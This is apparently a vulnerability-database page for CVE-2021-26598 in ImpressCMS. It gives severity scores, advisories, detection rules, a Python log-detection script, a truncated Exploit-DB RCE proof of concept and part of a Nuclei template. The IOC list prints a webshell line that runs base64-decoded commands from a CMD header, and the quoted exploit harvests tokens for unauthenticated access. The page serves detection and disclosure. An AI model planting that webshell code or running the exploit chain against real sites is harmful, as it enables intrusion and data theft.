CVE-2021-26598
Published 2022-03-28
Priority: P3 45 · Severity: medium, 5.3 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Exploit: available
EPSS: 10.81% (95.3rd percentile)
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| impresscms | impresscms | < 1.4.3 | 1.4.3 |
| impresscms | impresscms | >= 0 < 1.4.3 | 1.4.3 |
Detection & IOCs (extracted from sources)
- command: `curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); ... $params = "user_submit=1&token={$token[1]}&groups[]=%s";`
- command: `if (isset($_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode($_SERVER[HTTP_CMD])); die; }`
- Detect unauthenticated requests (GET or POST) to /include/findusers.php carrying a token parameter. This endpoint should not be reachable without authentication; it is the core of CVE-2021-26598.
- Alert on responses from /include/findusers.php containing all three fields 'last_login', 'user_regdate' and 'uname': this indicates successful unauthorized user data enumeration.
- Monitor for the two-step exploit sequence: a GET to /misc.php?action=showpopups&type=friend to harvest a TOKEN_REQUEST value, immediately followed by a request to /include/findusers.php using that token. This is the canonical exploitation pattern.
- Detect the regex patterns used to extract TOKEN_REQUEST from HTTP responses, `REQUEST' value='(.*?)'` or `REQUEST" value="(.*?)"`, which attackers use to automate token harvesting.
- Alert on POST requests to /modules/system/admin.php whose body contains 'fct=autotasks' and 'op=addautotasks': this is the RCE escalation step chained after CVE-2021-26598 exploitation.
- Detect HTTP requests to the ImpressCMS root URL carrying a custom 'CMD' header with a base64-encoded value: this is the command execution mechanism of the webshell planted via the autotasks RCE chain.
- Flag POST requests to /include/findusers.php with parameters 'user_submit=1' and 'groups[]' containing SQL injection payloads (e.g. SLEEP, ORD, SUBSTR, INSERT INTO), indicative of chained SQLi exploitation (CVE-2021-26599).
- Caveat: the security token required to exploit /include/findusers.php is legitimately obtainable by unauthenticated users via /misc.php?action=showpopups&type=friend, so token presence alone does not indicate authorization. Detection must focus on the unauthenticated context of the request, not on token validity.
- Caveat: the Nuclei template uses a two-request chain with an internal extractor; single-request detections against /include/findusers.php without the preceding token-harvest step may produce false negatives if the token must be valid.
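The detection items above, run as one script over constructed web-server log records. This is an added example written for this page, not code from the page's sources, from ImpressCMS or from the published PoC; the record layout (ts, src_ip, method, url, body, headers, response), the 60-second window used to pair a token harvest with its use, and the SAMPLE_LOG entries are assumptions made for illustration. It goes slightly beyond the bullets by requiring, for the chain rule, that the token used against findusers.php is the one that was just harvested by the same source, which is what keeps a bare token from counting as evidence (the first caveat).

```python
"""Detection logic for the CVE-2021-26598 / CVE-2021-26599 exploit chain.

Added example, not code from ImpressCMS or the published PoC: the record
layout, the 60-second chain window and SAMPLE_LOG are constructed here.
"""
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

TOKEN_EXTRACT_RE = re.compile(r"""REQUEST['"] value=['"](.*?)['"]""")  # lifts TOKEN_REQUEST
SQLI_RE = re.compile(r"\b(SLEEP|ORD|SUBSTR|INSERT\s+INTO)\b", re.IGNORECASE)  # groups[] SQLi
ENUM_FIELDS = ("last_login", "user_regdate", "uname")  # all three = successful enumeration
CHAIN_WINDOW_SECONDS = 60  # assumption: harvest and use happen back to back

def _path(rec):
    return urlsplit(rec["url"]).path

def _params(rec):
    """Merge query-string and form-body parameters into one dict of lists."""
    merged = defaultdict(list)
    for source in (urlsplit(rec["url"]).query, rec.get("body", "")):
        for key, vals in parse_qs(source, keep_blank_values=True).items():
            merged[key].extend(vals)
    return merged

def is_token_harvest(rec):
    """GET /misc.php?action=showpopups&type=friend, the unauthenticated token source."""
    p = _params(rec)
    return (rec["method"] == "GET" and _path(rec) == "/misc.php"
            and p.get("action") == ["showpopups"] and p.get("type") == ["friend"])

def harvested_token(rec):
    """TOKEN_REQUEST value an attacker could lift from the response, if present."""
    m = TOKEN_EXTRACT_RE.search(rec.get("response", ""))
    return m.group(1) if m else None

def is_findusers_with_token(rec):
    return _path(rec) == "/include/findusers.php" and "token" in _params(rec)

def is_successful_enumeration(rec):
    body = rec.get("response", "")
    return _path(rec) == "/include/findusers.php" and all(f in body for f in ENUM_FIELDS)

def has_sqli_in_groups(rec):
    groups = _params(rec).get("groups[]", [])
    return _path(rec) == "/include/findusers.php" and any(SQLI_RE.search(g) for g in groups)

def is_autotasks_rce(rec):
    """POST to admin.php with fct=autotasks&op=addautotasks, the RCE escalation step."""
    p = _params(rec)
    return (rec["method"] == "POST" and _path(rec) == "/modules/system/admin.php"
            and p.get("fct") == ["autotasks"] and p.get("op") == ["addautotasks"])

def has_cmd_header(rec):
    """Custom CMD request header carrying valid base64, the planted webshell's input."""
    value = {k.lower(): v for k, v in rec.get("headers", {}).items()}.get("cmd")
    try:
        base64.b64decode(value or "", validate=True)
    except (binascii.Error, ValueError):
        return False
    return value is not None

SINGLE_REQUEST_RULES = (
    ("findusers_token_request", is_findusers_with_token),
    ("user_enumeration_success", is_successful_enumeration),
    ("cve-2021-26599_sqli_groups", has_sqli_in_groups),
    ("autotasks_rce_escalation", is_autotasks_rce),
    ("webshell_cmd_header", has_cmd_header),
)

def detect(records):
    """Return (rule, src_ip, ts) alerts over the records, processed in time order."""
    alerts, last_harvest = [], {}  # last_harvest: src_ip -> (ts, token)
    for rec in sorted(records, key=lambda r: r["ts"]):
        src, ts = rec["src_ip"], rec["ts"]
        if is_token_harvest(rec):
            last_harvest[src] = (ts, harvested_token(rec))
        alerts.extend((name, src, ts) for name, rule in SINGLE_REQUEST_RULES if rule(rec))
        # A token alone proves nothing (anyone can fetch one); the chain signal is a
        # harvest followed shortly by use of that same token from the same source.
        if is_findusers_with_token(rec) and src in last_harvest:
            h_ts, h_token = last_harvest[src]
            reused = h_token is None or h_token in _params(rec)["token"]
            if 0 <= ts - h_ts <= CHAIN_WINDOW_SECONDS and reused:
                alerts.append(("cve-2021-26598_two_step_chain", src, ts))
    return alerts

# Constructed sample log: one source running the full chain, one benign visitor.
SAMPLE_LOG = [
    {"ts": 100, "src_ip": "203.0.113.7", "method": "GET", "headers": {},
     "url": "/misc.php?action=showpopups&type=friend",
     "response": "<input type='hidden' name='TOKEN_REQUEST' value='abc123' />"},
    {"ts": 102, "src_ip": "203.0.113.7", "method": "POST", "headers": {},
     "url": "/include/findusers.php", "body": "user_submit=1&token=abc123&groups[]=1",
     "response": '{"uname":"admin","last_login":"1648000000","user_regdate":"1600000000"}'},
    {"ts": 130, "src_ip": "203.0.113.7", "method": "POST", "headers": {}, "response": "",
     "url": "/include/findusers.php", "body": "user_submit=1&token=abc123&groups[]=1)+AND+SLEEP(5)"},
    {"ts": 200, "src_ip": "203.0.113.7", "method": "POST", "headers": {}, "response": "",
     "url": "/modules/system/admin.php", "body": "fct=autotasks&op=addautotasks&name=x"},
    {"ts": 210, "src_ip": "203.0.113.7", "method": "GET", "url": "/", "response": "",
     "headers": {"CMD": base64.b64encode(b"id").decode()}},
    {"ts": 900, "src_ip": "198.51.100.4", "method": "GET", "headers": {}, "response": "",
     "url": "/misc.php?action=showpopups&type=friend"},
]
```

Running `detect(SAMPLE_LOG)` yields the chain alert for both findusers.php requests from 203.0.113.7, plus the enumeration, SQLi, autotasks and CMD-header alerts, and nothing for the benign visitor who only loaded misc.php. A lone findusers.php request with no preceding harvest still produces the single-request alerts but not the chain alert, which is the false-negative trade-off the second caveat describes; tune CHAIN_WINDOW_SECONDS to the latency of the tooling you expect.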
CVSS provenance
- NVD v3.1: 5.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
GHSA
Incorrect Access Control in ImpressCMS
GHSA · 2022-03-29
CVE-2021-26598 [MEDIUM] CWE-287 Incorrect Access Control in ImpressCMS
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
OSV
Incorrect Access Control in ImpressCMS
OSV · 2022-03-29
CVE-2021-26598 [MEDIUM] Incorrect Access Control in ImpressCMS
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
No detection rules found.
Exploit-DB
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
Exploit-DB · 2022-03-30 · CVSS 9.8
CVE-2021-26599 [CRITICAL] ImpressCMS 1.4.2 - Remote Code Execution (RCE)
---
```php
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Author: Egidio Romano aka EgiX
# Date: 30/03/2022
# Version: ";
print "\nExample.: php $argv[0] http://localhost/impresscms/";
print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
die();
}
$url = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// Step 1: the token is handed out to unauthenticated clients (CVE-2021-26598)
print "\n[+] Retrieving security token (CVE-2021-26598)\n";
curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");
$res = curl_exec($ch);
if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session cookie not found!\n");
if (!preg_match("/TOKEN_REQUEST'
```
Nuclei
ImpressCMS <1.4.3 - Incorrect Authorization
Nuclei · CVSS 5.3
CVE-2021-26598 [MEDIUM] ImpressCMS <1.4.3 - Incorrect Authorization
ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
```yaml
id: CVE-2021-26598
info:
  name: ImpressCMS <1.4.3 - Incorrect Authorization
  author: gy741,pdteam
  severity: medium
  description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    U
```
References
- http://karmainsecurity.com/KIS-2022-03
- http://seclists.org/fulldisclosure/2022/Mar/45
- https://hackerone.com/reports/1081137
- https://packetstormsecurity.com/files/166403/ImpressCMS-1.4.2-Incorrect-Access-Control.html